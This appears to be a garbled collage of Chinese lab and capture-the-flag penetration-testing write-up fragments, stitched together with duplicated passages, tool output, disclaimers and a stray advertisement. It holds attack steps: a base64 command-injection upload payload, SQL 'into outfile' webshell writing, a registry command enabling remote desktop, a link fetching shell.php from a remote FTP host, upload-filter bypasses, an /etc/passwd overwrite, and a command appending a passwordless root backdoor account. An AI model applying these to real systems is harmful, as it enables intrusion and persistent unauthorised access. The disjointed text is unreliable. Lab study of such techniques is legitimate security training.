本公众号提供的工具、教程、学习路线、精品文章均为原创或互联网收集,旨在提高网络安全技术水平为目的,只做技术研究,谨遵守国家相关法律法规,请勿用于违法用途,如果您对文章内容有疑问,可以尝试加入交流群讨论或留言私信,如有侵权请联系小编处理。
inet 172.22.9.19 netmask 255.255.0.0 broadcast 172.22.255.255 inet6 fe80::216:3eff:fe0b:bb8b prefixlen 64 scopeid 0x20<link> ether 00:16:3e:0b:bb:8b txqueuelen 1000 (Ethernet) man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8: 8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp ⼀般打靶场这种后续都可以利⽤到。
Delegation是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。
ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 dc:e8: ad:80:35:81:c4:29:7e:cf:e4:70:f2:69:d9:96 (RSA) | 256 46:20:20:03:9c:97:35:f6:2d:5d:62:4a:be:6c:95:8e (ECDSA) |_ 256 ae:90:88:f6:63:8d:dc:60:fa:ff:fc:70:12:e4:f4:1f (ED25519) MAC Address: 00:0C:29:1B:B5
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNDU3ODUzNjcwMTMzNTUyOTgzMDExNzk0MzIxNzYKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJ0aW1lX2ludGVydmFsIgoKMjAyOS0wNS0yNiB0byAyMDI5LTA1LTI3Ci0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMTQ1Nzg1MzY3MDEzMzU1Mjk4MzAxMTc5NDMyMTc2CkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0ibGVhdmVfcmVxdWVzdCIKCntjbWR9Ci0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMTQ1Nzg1MzY3MDEzMzU1Mjk4MzAxMTc5NDMyMTc2CkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0ic2lnbmF0dXJlIjsgZmlsZW5hbWU9IlVudGl0bGVkLnBuZyIKQ29udGVudC1UeXBlOiBpbWFnZS9wbmcKColQTkcKGgoAAAAKSUhEUgAAAAoAAAAKCAIAAAACUFjqAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAApSURBVChTY9i +fbuAgAADAwMHB8f8+fMlJCSAbARA5gNVQFkjGzAwAADL7QTzijujCwAAAABJRU5ErkJgggotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTE0NTc4NTM2NzAxMzM1NTI5ODMwMTE3OTQzMjE3NgpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9InVzZXJfaW5wdXQiCgo8cD5hc2RmPC9wPgotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTE0NTc4NTM2NzAxMzM1NTI5ODMwMTE3OTQzMjE3Ni0t
https://www.vulnhub.com/entry/boredhackerblog-social-network,454/
into outfile写马的时候遇到中文编码问题 1.4 中文路径 命令: select '123' into outfile 'C:/vulnIIS/俱乐部/1.txt'; 这里由于浏览器为utf-8没法处理中文 fDenyTSConnections /t REG_DWORD /d 00000000 /f //开启远程桌面 利用抓到的普通用户明文上了远程桌面读取到了后台账号密码:administrator/8B
m=client&f=download&version=1&link=ZnRwOi8vMTkyLjE2OC41Mi4xL3NoZWxsLnBocA== link位置是base64编码的地址 然后正常访问到下载的木马文件
192.168.0.104 Linux Kernel 192.168.0.103 涉及技术 主机发现 网络扫描 强制访问 参数爆破 文件包含 PHP封装器 任意文件读取 SSH公钥登录 离线密码破解 系统权限漏洞利用 打靶开始 passwd可以进行文件写入 使用,openssl 生成一段密文 openssl passwd -1 然后替换/etc/passwd里面的x 20210925234956721039.png 提权成功,打靶结束
: 192.168.153.130 192.168.1.102 win7 > ip :192.168.153.128 win10 > ip : 192.168.153.129 0x02 打靶记录
乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
into outfile写马的时候遇到中文编码问题 1.4 中文路径 命令: select '123' into outfile 'C:/vulnIIS/俱乐部/1.txt'; 这里由于浏览器为utf-8没法处理中文 fDenyTSConnections /t REG_DWORD /d 00000000 /f //开启远程桌面 利用抓到的普通用户明文上了远程桌面读取到了后台账号密码:administrator/8B
27 ba 60 3b 91 d5 fa 53 fc 5b ae 4a c8 99 42 42 40 43 8b 35 43 cf 9c bb 10 7a dd 63 72 f6 ba 6c 7a 6b aa f2 cf 28 d1 f8 ab 4a 30 14 0c fe 6c 21 6f ec 5f 15 31 e8 6e 1c fd b0 b4 a6 a7 cc c3 f3 5a c3 51 98 54 31 5c 58 2f 01 f7 22 10 11 1b 31 91 fa 1a 35 8d 11 e9 c1 50 6c dc f8 c5 27 ba 60 3b 91 d5 fa 53 fc 5b ae 4a c8 99 42 42 40 43 8b 35 43 cf 9c bb 10 7a dd 63 72 f6 ba 6c 7a 6b 54 31 5c 58 2f 01 f7 22 10 11 1b 31 91 fa 1a 35 8d 11 e9 c1 50 6c dc f8 c5
既然看到了登录密码框,而且提示,账户名为:admin,只需要就用BurpSuite将密码爆破出来
可惜的是访问不了,因为做了域名绑定,所以需要我们在本地做个域名映射,这个和之前DC-2是一样的问题
erp[3] = 1835810317;erp[4] = 171731060;erp[5] = 1835810317;erp[6] = 168626748;erp[7] = 1751474532;erp[8] t配合使用 % 代表数字 ^ 代表特殊符号 @ 代表小写字符 , 代表大写字符 ┌──(kali㉿kali)-[~/daba/TBBT2]└─$ crunch 8 8 -t @@@train > password.txtCrunch will now generate the following amount of data: 158184 bytes0 MB0 Learn how MicroK8s just raised the bar for easy, resilient and secure K8s cluster deployment. group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8
在页面中多浏览一下,发现Contact模块下可以输入内容,于是尝试多输入几次之后,发现了有意思的地方
一句话木马getshell会在Pass02[4]演示一遍,之后将不再演示1. webshell最好设置不同名,或者在每次上传成功后删除,避免出现绕过失败但测试成功的情况 Pass14~Pass21的题解见:打靶归来 ,可以给文件名后缀末添加.来绕过 原理:Windows在保存文件时,会自动去除末尾的. jzx8u 【Pass09 - 利用::$DATA绕过】 题目: i0jbw 绕过方法 缺少去除字符串::DATA ,可以绕过之前出现的大部分黑名单检测,所以说黑名单检测是真的不安全 【Pass11 - 双写绕过】 题目: tel6p 绕过方法 将数据替换为空,则可以使用双写绕过,即在后缀名中嵌套后缀名进行绕过 w8grl /upload/shell.php 第一步:修改webshell的后缀为白名单内的后缀并上传 第二步:抓包,然后修改URL值 第三步:访问%00前填入的文件名,判断是否上传成功 1g9bj od7w8 第三步:访问0x00前填入的文件名,判断是否上传成功 下篇正在路上……… jm4ki 参考资料 upload-labs:*https://github.com/c0ny1/upload-labs*[8]
前言 这篇文章是零度安全2021年的首篇文章,后期将会陆续更新打靶,实战系列的文章。 在这里也感谢大家对零度安全的支持与信任。 ? 这个时候我们获取了123456 加密后的密码 进入数据库执行 update users set pass='SDlSKHHi7ce.SDNqIi.ADRfU4jht/eXAyXmj8pINH0oqLO4IW9vOM'where 到这就拿下了整个靶机 为了登录方便执行 echo'admin::0:0:: /root:/bin/bash' >> /etc/passwd 给服务器写入账户为admin的免密登录账号,方便下次登录 8.
打靶过程 3.1 第一层 nmap端口扫描 看到80端口开放的Laravel 寻找了多个EXP之后,终于找到一个能用的:将脚本文件和phpggc这个脚本放在同一级目录下 phpgcc:https:/